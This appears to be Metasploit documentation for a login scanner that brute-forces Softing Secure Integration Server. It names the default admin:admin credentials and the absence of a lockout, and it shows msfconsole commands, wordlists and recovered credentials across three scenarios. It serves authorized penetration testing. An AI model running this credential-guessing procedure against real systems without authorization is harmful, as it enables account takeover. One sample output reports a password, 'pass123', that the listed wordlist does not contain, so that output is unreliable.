documentation/modules/auxiliary/scanner/http/softing_sis_login.md
This module allows you to authenticate to Softing Secure Integration Server.
By default:
admin:admin.There does not seem to be a limit to the number of times login attempts can be made.
This module was tested against version 1.22, installed on Windows Server 2019 Standard x64.
1.22 Download
msfconsoleuse auxiliary/scanner/http/softing_sis_loginset RHOSTS <target_ip> OR set RHOSTS file:/path/to/targets/file if against several targetsset SSL true if necessaryset RPORT 443 if SSL is setset USERNAME <username> if necessary. Default is adminset PASSWORD <password> if necessary. Default is adminrunIf running against several usernames: set USER_FILE /path/to/usernames_file
If using a wordlist (e.g. common passwords): set PASS_FILE /path/to/passwords_file
USER_FILE and PASS_FILE take priority over USERNAME and PASSWORD.
A username:password pair of credentials can be provided by doing set USERPASS_FILE /path/to/userpass_file.
In this scenario, the default options were used.
msf > use auxiliary/scanner/http/softing_sis_login
msf auxiliary(scanner/http/softing_sis_login) > set RHOSTS 192.168.50.119
RHOSTS => 192.168.50.119
msf auxiliary(scanner/http/softing_sis_login) > run
[+] 192.168.50.119:8099 - Success: 'admin:admin'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/softing_sis_login) >
creds output:
msf auxiliary(scanner/http/softing_sis_login) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
192.168.50.119 192.168.50.119 8099/tcp (http) admin admin Password
msf auxiliary(scanner/http/softing_sis_login) >
In this scenario, the default password for the admin user has been changed, and SSL was used.
msf > use auxiliary/scanner/http/softing_sis_login
msf auxiliary(scanner/http/softing_sis_login) > set RHOSTS 192.168.50.119
RHOSTS => 192.168.50.119
msf auxiliary(scanner/http/softing_sis_login) > set PASSWORD admin123
PASSWORD => admin123
msf auxiliary(scanner/http/softing_sis_login) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf auxiliary(scanner/http/softing_sis_login) > set RPORT 443
RPORT => 443
msf auxiliary(scanner/http/softing_sis_login) > run
[+] 192.168.50.119:443 - Success: 'admin:admin123'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/softing_sis_login) >
creds output:
msf auxiliary(scanner/http/softing_sis_login) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
192.168.50.119 192.168.50.119 8099/tcp (http) admin admin Password
192.168.50.119 192.168.50.119 443/tcp (https) admin admin123 Password
msf auxiliary(scanner/http/softing_sis_login) >
In this scenario, we have several targets that have different usernames and passwords for each. All the targets have the Softing Secure Integration Server login page enabled at TCP/8099.
Contents of usernames.txt:
admin
admin1
user
lowpriv
guest
Contents of passwords.txt:
admin
admin123
BadPass
GoodPass?
P@ssw0rd
user
pass
password
lowpriv
Contents of targets.txt:
192.168.50.71
192.168.50.119
192.168.50.206
Module output:
msf > use auxiliary/scanner/http/softing_sis_login
msf auxiliary(scanner/http/softing_sis_login) > set RHOSTS file:/home/ubuntu/Documents/targets.txt
RHOSTS => file:/home/ubuntu/Documents/targets.txt
msf auxiliary(scanner/http/softing_sis_login) > set USER_FILE ~/Documents/usernames.txt
USER_FILE => ~/Documents/usernames.txt
msf auxiliary(scanner/http/softing_sis_login) > set PASS_FILE ~/Documents/passwords.txt
PASS_FILE => ~/Documents/passwords.txt
msf auxiliary(scanner/http/softing_sis_login) > set VERBOSE false
VERBOSE => false
msf auxiliary(scanner/http/softing_sis_login) > run
[+] 192.168.50.71:8099 - Success: 'admin:P@ssw0rd'
[*] Scanned 1 of 3 hosts (33% complete)
[+] 192.168.50.119:8099 - Success: 'admin:admin'
[*] Scanned 2 of 3 hosts (66% complete)
[+] 192.168.50.206:8099 - Success: 'admin:pass123'
[+] 192.168.50.206:8099 - Success: 'admin1:admin123'
[*] Scanned 3 of 3 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/softing_sis_login) >
Note that VERBOSE was set to false in this scenario to reduce amount of output on screen.
By default, VERBOSE is set to true, which also outputs failed login attempts.
creds output:
msf auxiliary(scanner/http/softing_sis_login) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
192.168.50.71 192.168.50.71 8099/tcp (http) admin P@ssw0rd Password
192.168.50.119 192.168.50.119 8099/tcp (http) admin admin Password
192.168.50.206 192.168.50.206 8099/tcp (http) admin pass123 Password
192.168.50.206 192.168.50.206 8099/tcp (http) admin1 admin123 Password
msf auxiliary(scanner/http/softing_sis_login) >